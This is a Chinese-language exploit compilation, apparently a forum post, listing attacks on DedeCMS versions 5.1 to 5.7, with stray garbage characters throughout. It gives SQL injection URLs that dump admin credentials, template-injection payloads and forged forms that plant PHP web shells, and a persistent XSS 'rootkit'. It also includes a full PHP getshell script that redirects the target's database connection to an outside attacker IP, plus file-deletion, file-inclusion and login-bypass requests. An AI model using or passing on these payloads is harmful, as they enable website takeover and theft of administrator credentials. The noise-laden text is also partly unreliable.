|
|
5 j: l3 N; v6 }- a- i9 j0 C$ |' w
Dedecms 5.6 rss注入漏洞
9 Y& v Z- x. F" fhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1+ @9 N) n' U: ^, `
6 S. q: n7 K8 B6 |: y
+ U: x! G7 @ Q4 L9 G c) V! |
+ u ]3 n& \/ i h( N: i5 O; A4 |; I
& s- J! N9 r8 s6 Z* e6 j m' u, ]
- y# l3 j0 p1 Q% ?) u
/ _6 I+ r: [" d8 Y. G' D' _' C0 G1 @' P6 a) g; M& C
/ i: p+ q$ e; uDedeCms v5.6 嵌入恶意代码执行漏洞0 a2 `" P( Z! z1 s
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}% a: h! T# }: z' V8 p
发表后查看或修改即可执行( t$ s) [# ?# u4 b
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
2 g2 ?6 s" A2 a* a9 {' o. v6 m生成x.php 密码xiao,直接生成一句话。
) G: g7 d8 n" k6 f2 t6 Y; y7 \, e+ x$ H' O' G) t
s0 S' C- Z2 r; H
3 p& K. m! ?6 O# |0 R, }$ T& L
' K2 Y, e( X: w8 D3 o s3 }, ~% t. q
/ k/ c) k; S9 d
$ T) }7 t/ N& N; [& w9 \: K( t, L- B( H
Dede 5.6 GBK SQL注入漏洞
! D b' y/ z7 k' Fhttp://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
& k4 M' H# c( ~* ohttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe) c' M+ C; H! C* l/ |
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7, H- _' n( j, E: {$ A9 o; F; p
; {5 s) K4 \/ H+ H
- y! F, F8 P2 b D0 f" z
, R4 P1 @- O% o4 O1 B/ g
, j! `: L5 z8 h, q
* X* Z( I" C4 ^: T+ t% {" ]
& f4 _6 [2 C; c" x% |
# A' g2 S6 c. c$ o5 F: Z$ o( h, x4 h5 D
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ L. T/ A* t7 n H4 chttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` 8 P9 r" A, F: M. Q. K% n' E
+ H; O w7 e8 N; F- d6 C
2 O9 R: E1 H! ~5 W
/ c5 n+ \; }9 _7 ?7 C! F- X
5 ~1 z4 s% q1 z" h- J0 [
, Y0 x/ ? F. b2 @$ w% J+ E6 E# T I4 e1 F5 z3 w& J0 a% z
DEDECMS 全版本 gotopage变量XSS漏洞
6 b8 ` c: p) y! x7 Y r1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
8 g; g( [& |' f7 s6 W1 vhttp://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="1 P$ k& D" |' e! i6 x
9 [. a- @5 I% Q! }) V: V4 X
1 C( c6 o `& V7 A) `
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。 - \1 c: H2 Y8 s7 I
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
/ U* x3 \( w# C" E1 B4 ?1 w- v; J. h# [/ s4 S
$ U( d; E* a+ w! V# Khttp://v57.demo.dedecms.com/dede/login.php0 I/ i7 B( W4 h! @4 T( p
# m0 w; z. P& U2 @
) O( Z' B. z/ r* _( Q
color=Red]DeDeCMS(织梦)变量覆盖getshell; q- F% Y4 i: c O& y8 P+ w6 K
#!usr/bin/php -w
7 ]0 C$ h' a7 s& C<?php
- n# v3 k" j2 `; g/ ?6 Cerror_reporting(E_ERROR);) i. v: R! M7 M- C
set_time_limit(0);
, [) h1 C. ^5 ]9 T% c& C% {, Lprint_r('3 C, U2 `3 X$ ~6 d1 b% m+ j
DEDEcms Variable Coverage$ @% @# K& K. S' B0 {
Exploit Author: www.heixiaozi.comwww.webvul.com* {# i- O$ }( b# ]' ~ l+ |- s
);; @2 f3 q8 M- v. k l) m( C
echo "\r\n";: h, _- V) G7 i3 ]' q D
if($argv[2]==null){* \& R. o5 G* b% \& E
print_r('2 u( J7 p0 X! A- x& C% s
+---------------------------------------------------------------------------+! D0 l( c$ d; E8 ?% p
Usage: php '.$argv[0].' url aid path) |7 O1 l9 M! T/ Q3 b
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/; L0 b/ L$ y& a1 o: K, d6 N* G
Example:
' u! w, g1 R$ E, K8 uphp '.$argv[0].' www.site.com 1 old
^9 C( G/ f1 i2 `+---------------------------------------------------------------------------+- e. G+ u x5 H. D+ x9 o( z
');% ]& p# }! t) [3 h, L8 ~& Q
exit;
$ V' M9 f; L x& E. H}6 z" O6 a) [9 |3 N1 n; ^/ M
$url=$argv[1];
2 E9 F7 F0 C2 d4 {9 j7 X @! C3 i$aid=$argv[2];' c. ]$ Z. `0 Z) V/ G8 }
$path=$argv[3];
5 E8 x! ]1 H5 V$ s0 r$exp=Getshell($url,$aid,$path);
+ q* }, y" d' J* E( x1 L& vif (strpos($exp,"OK")>12){* r% I9 D1 i% l8 O" A
echo "
% Y& F' \; n. I1 Z( M/ m, `Exploit Success \n";" @2 c: T! X6 Q9 j1 t: [
if($aid==1)echo "& ~, v( F- g$ u2 m( T8 J
Shell:".$url."/$path/data/cache/fuck.php\n" ;
% t4 T$ L! ?& _8 F# W+ c+ c2 ~' q4 [; ^: X5 }1 {
) U) w9 k) f6 W+ u) d2 I" x
if($aid==2)echo ": ~+ e5 \2 d2 K g$ O. H8 B0 x T
Shell:".$url."/$path/fuck.php\n" ;
1 W& f' H+ d+ u- C# y$ l3 \2 ]3 \) e. o: f: M. T
, @" `9 P# s% s9 }3 Q( E9 W! i
if($aid==3)echo "6 ?1 f( s3 J8 H4 H
Shell:".$url."/$path/plus/fuck.php\n";
9 O. s/ w% ]' Z1 _/ @7 v8 F i, o5 r( c, [
) A0 D& j$ G+ G! A( s
}else{/ \4 b0 ^2 m# O
echo "% U4 f8 K: T1 i+ J' m9 [# Y4 D q& ~
Exploit Failed \n";- X. m( \$ W2 L. M0 S2 U2 `
}) s( t" u! T$ `' e' d& o0 z
function Getshell($url,$aid,$path){
7 }5 L8 h9 |9 _1 F2 X) d F$id=$aid;
# S# N' v. f! H% c o9 u$ t; P$host=$url;
8 a Y$ b8 K# u. a4 Y! O/ W. W9 h$port="80";
- u( R2 d5 u3 B8 `3 P$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";( a/ i" J# k: R; s B6 _8 @
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";3 ?8 l5 o9 j1 i" n0 i
$data .= "Host: ".$host."\r\n";4 m) Q! {/ V, d
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";3 g! E5 k1 ?6 I. C0 m
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";* i c; {' H/ M- K3 {
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";0 b* M; C8 T- T/ L) ~# f8 w
//$data .= "Accept-Encoding: gzip,deflate\r\n";
* K, U& M: n2 I" y( r$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";6 c- ?% C" a0 w# e7 X# @/ D
$data .= "Connection: keep-alive\r\n";# Z$ w3 \6 z) s! t5 j, ?0 ~5 E; e
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";+ v* ?- U0 p8 ~( U5 @
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
# e/ q$ g3 X! ^9 I6 x$data .= $content."\r\n";
* A4 B8 @6 r! U% o& ~$ock=fsockopen($host,$port);
4 l3 R( w" D _" X }$ bif (!$ock) {
' j/ v5 v% d& s2 f2 Decho "
Y/ Z5 ^3 B+ Q5 Z5 zNo response from ".$host."\n";
4 V: V, o2 ^3 U6 M1 V}
& d# t' u- j3 t- e2 P& Jfwrite($ock,$data);
8 s ^! ?# U6 nwhile (!feof($ock)) {
0 l0 _5 Q. p3 i# M% H$exp=fgets($ock, 1024);, o# f1 c @) Z4 g' }* I
return $exp;' S# m7 C8 `# n: V3 f5 [
}7 b$ h2 Z. ^4 H/ d& u) K/ k
}& z7 l! `% y# I) L* w7 k
5 C6 A$ V q- b6 g& {9 j
6 |: y9 U3 i. v* i# R; Y: F6 ^! ?* B?>1 ]2 ?. a5 A9 t) [" Z% u7 ]
* {& M: m1 u1 Y) q
9 u z4 {5 g" M2 U# C( }
; G/ K, R; s v8 [+ {( m4 T
3 [# Q. h% o: Y0 c ^: n3 ]' d5 i; Q" k$ ^
7 Y4 C: t; }) `5 l0 p, |) U$ A: {9 P3 I: T$ W4 d
4 Q' G4 P5 s7 {3 p ~5 h' i& p0 C. }, Z8 ~+ C8 l% ]
& |* k! i# l# ?& e/ \- t8 c1 |DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)
/ H& U/ |& S+ K# C5 ]" Hhttp://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root. S2 r g8 w7 H
% s. A: g0 l% x4 Y0 n H) Z+ w# b
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
8 Z \, Z) U, z' N
; X4 M' W- y, v9 g, g
( R% I$ ]# n3 b7 R此漏洞的前提是必须得到后台路径才能实现6 B! ~$ ^) @$ N, E* K% @% l
8 f1 {' i1 [4 t6 x- ~$ ]4 ?
1 F/ I& |( l u S V: e, ~: B+ t7 O3 R4 M9 G5 Q! j. ]; Q" L$ |
2 O4 T& S2 D8 `+ }, v
5 I+ s. l; L9 C! Y1 s' ?. Z- y; [! |* S) t- f$ ?. {
D5 y9 Y: b% h9 E8 [* z
) v k/ x3 {( |! m7 E1 v- F; z
& j9 D$ N7 w5 L5 L1 ]9 M$ Y
- [* d: @- I# V- c tDedecms织梦 标签远程文件写入漏洞
% d$ D- A3 c% ~" G前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');; [: C) n$ T6 z
- P8 Y: G; ~; u# C) \3 X
4 v+ Q7 \( M& x. A) S4 J) D再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
2 f3 [4 K1 |7 _<form action="" method="post" name="QuickSearch" id="QuickSearch">
: j& F$ ?+ K6 h, a. W<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
! [0 K5 g: ?6 t( ^$ \<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />. N( W9 z+ [" K9 x
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />1 U# W& C- ~( ^; F3 G: m/ W
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />$ }$ C; Z7 A4 V# t* n4 N
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
# \- B% M7 K4 U ~) G) w7 X<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
0 r" ^2 w; k$ Q. _<input type="text" value="true" name="nocache" style="width:400"> |% T W! V* m
<input type="submit" value="提交" name="QuickSearchBtn"><br />
% H; O8 y, B' {: r7 e9 e</form>3 A! G5 E- J& }! J$ Z! B
<script>: l) k' ^ K, R+ j- m
function addaction()2 X) C8 T7 l; i
{7 w/ f- S5 L5 t1 j1 \9 `9 n
document.QuickSearch.action=document.QuickSearch.doaction.value;
* J1 G& _* w7 t) o# I* ~}" Z- W* Z( N; `
</script>
0 j' \; n1 f% f" {
$ d# T% @6 ]$ g! ?- s- k4 ^* t5 c7 h) L$ o
+ K/ ]( j& r' u- N2 O; u5 M
9 E* c# U2 }! b) q2 Z, q: X) N
6 n% `2 c. ~5 n4 X2 u) X+ m8 r+ Y# `: T: H
. _# j' u) |9 b- r s: Z
2 b$ k. m( m" ^2 Y& G" E
/ n6 F2 B) j5 E' s C/ Z; B; w5 ?- Z5 S" @
DedeCms v5.6 嵌入恶意代码执行漏洞
3 n1 d" }5 z0 ?: T7 a9 S% T4 X( j注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行" U( x8 \# J, }( i1 g0 ?( D2 u
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}- j5 k( {3 X) Z* s9 C" G# {
生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得
! P( E |, _+ r9 _Dedecms <= V5.6 Final模板执行漏洞 \) ?) y u x4 e1 v
注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:
: R7 G; a5 R! q- e; @ h' z' L$ l: vuploads/userup/2/12OMX04-15A.jpg
* p q) B1 s" ~ P6 p+ d4 G% Z+ T7 \. ~, q4 ?
1 w0 i: _# m! J7 v5 ^模板内容是(如果限制图片格式,加gif89a):
1 l! s1 ^; H w3 ? f8 m6 Q{dede:name runphp='yes'}0 W" K6 D& X1 o
$fp = @fopen("1.php", 'a');
3 E7 G9 @) o6 i% D$ J& ?% a% f4 ]@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");8 |9 s% _# ]# _3 P: L( n
@fclose($fp);
7 p/ P4 W( G: u# i3 e7 b5 D9 x{/dede:name}2 Y* b3 s s/ I# i2 i
2 修改刚刚发表的文章,查看源文件,构造一个表单:
# U. H0 }- _% a/ s" _: G<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
6 K. D& \$ Y, g- A' {) g$ Q; g$ W F<input type="hidden" name="dopost" value="save" />
$ \: c" K8 a( @9 |' g. O8 Y# ^7 N<input type="hidden" name="aid" value="2" />/ J1 d- @( \6 ]& D2 X" J
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
/ O4 v& Z" w% y" N o0 L! ]/ O- X<input type="hidden" name="channelid" value="1" />( h: m6 B- X- ?: G& E
<input type="hidden" name="oldlitpic" value="" />
2 l q: t0 e8 `' v$ i<input type="hidden" name="sortrank" value="1275972263" />: V0 V3 W. r7 F& E" i+ _
& q& w8 Y! C! ]$ z2 z' S- i" Y
- ]3 G: R2 ~- N9 I( N% \: j0 ~) \<div id="mainCp">* T8 ]9 L; y5 c. z
<h3 class="meTitle"><strong>修改文章</strong></h3>
( Z5 \* ] a3 @1 l- ~% F
* m% Q; l# g6 w" a, q. p# {5 G( n% b3 v3 [) g
<div class="postForm"> B% {. N; v4 U. }% a3 ?
<label>标题:</label>& ~8 w" M, `8 ]% b$ s3 D* A
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>9 J3 i8 d1 c% \/ b* c0 p I
" z8 h/ i# }7 h. _/ h, ^
) M _4 k7 M8 j, U! |
<label>标签TAG:</label>
; d8 w/ f: m6 b0 ]( D6 F<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)5 J) ^7 M* C5 S1 r
7 l4 ]: b3 S3 Y! q
2 h8 g& U& c3 c; q4 M<label>作者:</label>
# B1 y! U. N. N/ C<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
, K/ Z# e! Y8 ^0 n$ L; y: [: H
: j- n v- J$ P0 I
3 f4 C7 I* e: v- E& ]<label>隶属栏目:</label>
1 v8 I, T; d1 b# F<select name='typeid' size='1'>' L& ]& w! @$ ^% |- u: L
<option value='1' class='option3' selected=''>测试栏目</option>
* D; z, o: o( w</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
% @: B4 n9 p3 D' ]' y3 ]7 J; c. z2 c- m9 K+ V ~
$ l- u7 @0 E6 N6 _8 E
<label>我的分类:</label>' r, ?/ B, H$ G7 ^9 }/ j
<select name='mtypesid' size='1'>3 j! J& d2 a" z& |
<option value='0' selected>请选择分类...</option>+ _' v8 f) C6 g5 X2 U
<option value='1' class='option3' selected>hahahha</option>
5 I' ]0 W I2 s0 s- t0 z. p</select>
/ n+ X* }2 g3 T6 [: N9 N! i& y2 w
- o5 \0 a& g# ^3 R* ]( g! X1 }
<label>信息摘要:</label>
$ K7 N7 ~. P8 r& J9 T6 j6 X S<textarea name="description" id="description">1111111</textarea>
* A9 X5 r/ V. s. \1 C4 d8 z(内容的简要说明)
+ v$ X# z- w5 g3 ~
+ d) J6 ]3 X9 j' O) a+ D1 M* n& _
<label>缩略图:</label>& t6 \' a; d& l) r6 H
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
* j! ~( g& n7 S! m
( C3 q5 X' n) D5 {2 ~: U D, x' c9 g0 A1 J8 {% t- q5 @
<input type='text' name='templet'! K# F5 X& y% h* j1 V
value="../ uploads/userup/2/12OMX04-15A.jpg"> T# U- o& g, S* Q7 S+ p! }
<input type='text' name='dede_addonfields'
1 }6 y! }0 y9 D! yvalue="templet,htmltext;">(这里构造)$ h: O |) H2 t
</div>
) `4 J" g4 V n+ [7 a( m/ c) T; K7 C$ z3 ~& q/ m/ r
' Q8 l3 Z( U. T
<!-- 表单操作区域 -->
" t! A. A( _' d9 ~7 h* u7 d0 ^<h3 class="meTitle">详细内容</h3>
c+ @3 }& x8 R7 k- S; P# z' I% r8 I5 }3 d8 N
4 ?# S* {0 H% X0 Y; r$ N/ y. `<div class="contentShow postForm">5 }% Y* |7 j8 i$ N2 b! G" d
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
7 Z x) @% p, e. _5 v4 M0 u* S( l, Z0 u5 S% M! q2 _- B) Y( Q
6 L) l# n) P& D8 ?
<label>验证码:</label>8 C' M; X' P: S, h; f- ]
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
1 v! M V6 [# P. f<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
1 H% t# e p3 B" | h% r& n6 ~7 ]: E- k+ ?; r# W! y
4 w# ]2 @4 `+ C# N* p( p V<button class="button2" type="submit">提交</button>
/ g& R, s! e+ A- H# R4 ?<button class="button2 ml10" type="reset">重置</button>
* ~: \" @* d- b8 m( S) l5 ^* O+ F</div>% [: |( r: Q& w
* Z3 I/ i1 `3 z% }5 k5 v! W* h7 ~
; m4 g. a9 ~2 D7 o7 Z</div>! Z/ I+ v/ X" \; X f
5 C( P* ?6 n3 c1 T9 e5 u- z2 K2 K
4 w1 B! F. L* [" }) O</form>
8 J3 j3 E2 k3 F" n% j' {" G h+ @# A. f8 T" @
`. c6 d( G/ D" u7 C. M* k2 N( w
提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
! j" I$ N/ w: @( m假设刚刚修改的文章的aid为2,则我们只需要访问:0 D4 u& R, B' {; y1 P
http://127.0.0.1/dede/plus/view.php?aid=22 {4 x- f* S3 M5 H8 e' g
即可以在plus目录下生成webshell:1.php& s/ E1 I; s4 C$ ]5 e% a
/ m, T: K4 o8 k/ ]: I- k0 O3 R8 K3 W$ Z. {6 t4 \0 m8 u
9 p5 s) O6 h/ W% `5 O
) z1 W6 X0 \$ L1 ^, j6 X
. M$ T4 \' A9 }7 B" o4 D( s1 }7 d1 L/ O% }. l6 x4 D/ b- \% E4 V( D
4 r" x" k6 R% ]* Y$ j" x5 `
& M2 x( c9 [4 h# Q7 t3 C) e1 r+ c: P: G, x# s
; w$ R- a* W O8 r, P1 q
/ r+ S: i/ S* s1 [
4 c) m, M1 q# R* r& q! i0 B4 g) }' TDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
4 O$ u! j4 U3 M' ^Gif89a{dede:field name='toby57' runphp='yes'}- v% e1 q: B$ Z; Z8 ]1 i0 u
phpinfo();* A. w- r. d( R; ^4 c) x1 @6 ?
{/dede:field}" U$ y) a9 _% V
保存为1.gif c' }* m1 ]! G6 Q
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
9 J& _3 M2 w) n1 `<input type="hidden" name="aid" value="7" /> 9 s( B: \0 d9 ?
<input type="hidden" name="mediatype" value="1" /> ( p+ r5 Y9 @& ^) m% h7 }
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br>
& r' J3 S: O2 u; k1 g; I) W O9 a& l<input type="hidden" name="dopost" value="save" />
1 Z5 g+ G0 H. H: G: m: [( l) L: ?<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/> ; b) E6 w, f) @( l+ ~! Z ^7 Q2 M
<input name="addonfile" type="file" id="addonfile"/>
9 K' a% }8 h0 U4 x2 l<button class="button2" type="submit" >更改</button> 1 O9 g( t$ q/ f& u& i* _% I
</form>
% }3 O5 s: M3 s( u
5 A" C: @( C( ]8 K+ c, z- f. y2 p, X1 w' Q* k, i( Z
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
+ G( Z \9 E. f2 n' K' }; @6 Z发表文章,然后构造修改表单如下:1 {3 R, G. n5 j7 T( H3 I! ~( A
0 g/ U( ?# u: `& r' }5 @, N& ~
E& C ?: F3 K% q9 P# |$ ?5 n<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data"> 6 [& G- V1 A/ r) c, k9 a
<input type="hidden" name="dopost" value="save" /> # e. [9 V6 u7 |7 s
<input type="hidden" name="aid" value="2" />
7 V7 s) ^ u0 l [+ D<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
6 a( m. w7 \7 Q" R' L* u<input type="hidden" name="channelid" value="1" /> 2 W3 g& M8 b! d1 f2 j
<input type="hidden" name="oldlitpic" value="" />
; _! Y; S" b! ~5 M<input type="hidden" name="sortrank" value="1282049150" />
# h5 Q! e! y* ^6 l U<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
! b* l0 I7 O4 A. R0 A# Y) L8 j<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
# a3 @+ T+ n6 x<select name='typeid' size='1'> 4 \* g g2 O t
<option value='1' class='option3' selected=''>Test</option>
X: o; |; b. O<select name='mtypesid' size='1'>
4 X0 M2 i; c) B<option value='0' selected>请选择分类...</option> : W: h8 T9 ~8 @/ [: {0 B2 G3 Y
<option value='1' class='option3' selected>aa</option></select>
% l- w( ^) g* ?4 t7 F" R# Z/ U) ? G<textarea name="description" id="description">aaaaaaaaaaaaa</textarea> 1 ]5 S; q5 H& ?3 M* J4 u' o& [
<input type='hidden' name='dede_addonfields' value="templet">
% z3 h! X9 ^4 E1 [<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
! r% E8 {! ]: U2 S: P<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
" W" j6 V S4 v* X* [<button class="button2" type="submit">提交</button> / J" {- u, l0 [% d( |/ p! ~
</form>
9 f$ a7 A) C# z0 `2 k) G/ I# d$ `8 t' r: z
9 v1 j; M" [' j) F# X, i- @' l) R
" C1 H7 V& L, q- h& H4 d, v" k9 K$ J
( a" T. f; m6 i# _3 z( p& u) R' `' _0 C3 W4 o
, z9 F' i1 {" i. ~0 M' n* h/ V) u3 O# y, N
' u2 F; V3 `3 U; C( F/ Z" v9 `/ t
! u( [# K* Q3 ^4 _
: z0 O. P, a7 ^, z5 |3 N
. {+ N$ w" e2 `4 Q/ ]. E
: J+ y& ~# {. X% R6 p6 ~$ r( ~5 _织梦(Dedecms)V5.6 远程文件删除漏洞, {' D) v( \# F' Z5 Z+ }
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
9 w1 g0 |, \3 z1 N; g1 t0 l* U+ u3 v$ g6 G! {: c: R7 I
# w+ i; r L' l$ |
' }+ H3 S; E S0 W/ `2 i' n/ ]& R F0 l7 _
$ o, e3 I: E- o9 M% f. a0 [1 ^/ v* p- v! j
9 K2 k7 r! j7 S1 i
3 N" t% U# L0 C' S- b/ \
# a0 p6 [0 o1 L' e6 ~" U5 q! c& A9 K" F& A9 V8 j' T
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞
' Q1 `: L/ |; w# h3 M6 Ahttp://www.test.com/plus/carbuya ... urn&code=../../$ \+ f, u" c+ ^# x: D$ K
5 {# ?; M7 ?4 _* m8 d8 \; z
; h, Y# b# O7 P- r/ Y% I9 C! k8 M
/ ]) Z; y. L8 w0 V# d! A0 y0 s' X, q2 y7 M; a) n: m4 B4 O" u7 E
Y% l" B/ n8 A( @$ v7 P' b7 p
. Z, f) o& v' ], c& y, I* Z; p( \+ a3 f9 @9 A
. ?3 a. |5 W! |- t% ~
{( W- ?' u1 S! x+ r
% {% Q9 T, M; c% T, _DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 f( V# r& F! A$ ?/ S- c
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`0 f7 ~& b) a2 z* n
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD59 F: k5 a% ~" m2 j$ s
! D8 E+ A! I+ m( y. g
/ w) d$ ?5 ]8 P- I6 {" T& B: W8 P# g& W- y6 V
# B% e$ z6 p$ a9 B! o( E
: a! H0 ~$ y( k6 e" h! A
+ m, R9 w4 }+ i* E T* {8 J+ ?! s( I8 p0 P; I5 X1 u1 M/ T
% M' ~( s0 P( p7 A
% j9 P6 b% m K8 e" f( u9 k; D/ I5 ~- Z; L
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞& {7 A2 f) @+ q& @9 U4 |
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
s8 d* d I4 V% d0 u4 K$ d0 B
9 J& B& z* j$ h R! p9 L" c; B. y0 Z* @
, ?) x5 A/ [* k
5 F: W z3 ?6 t6 e# E# ?6 s
$ K; I7 H: z, j$ m9 l# M+ ]& v- W; C. Q* v7 h' a' c& g- z4 y2 H8 v
4 |' T7 n$ |) n& r2 ~+ |" ^1 ?
9 H& ~) v- E; _2 `( v6 r G, W& {. y* N
